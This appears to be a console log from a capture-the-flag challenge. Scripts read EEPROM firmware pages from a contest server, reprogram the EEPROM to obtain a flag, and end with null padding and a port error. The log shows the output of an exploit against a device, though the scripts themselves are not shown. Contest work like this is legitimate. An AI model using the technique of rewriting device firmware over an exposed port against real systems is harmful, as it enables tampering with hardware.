$ python3 l1-read-eeprom.py
[+] Opening connection to weather.2022.ctfcompetition.com on port 1337: Done
page=0
b'\x02\x00\x06\x02\x04\xe4u\x810\x12\x08\x86\xe5\x82`\x03\x02\x00\x03y\x00\xe9D\x00`\x1bz\x00\x90\n\x02x\x01u\xa0\x02\xe4\x93\xf2\xa3\x08\xb8\x00\x02\x05\xa0\xd9\xf4\xda\xf2u\xa0\xff\xe4x\xff\xf6\xd8\xfdx\x00\xe8D\x00'
page=1
b'`\ny\x01u\xa0\x00\xe4\xf3\t\xd8\xfcx\x00\xe8D\x02`\x0cy\x02\x90\x00\x01\xe4\xf0\xa3\xd8\xfc\xd9\xfau\x08\xeeu\t\tu\n\x80u\x0b\xf2u\x0c\tu\r\x80u\x0e\xf6u\x0f\tu\x10\x80u\x11\xfau\x12\t'
page=2


$ python3 l2-reprogram-eeprom.py
[+] Opening connection to weather.2022.ctfcompetition.com on port 1337: Done
status=b'transaction completed / ready'
status=b'transaction completed / ready'
? CTF{DoesAnyoneEvenReadFlagsAnymore?}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-err: port invalid or not allowed
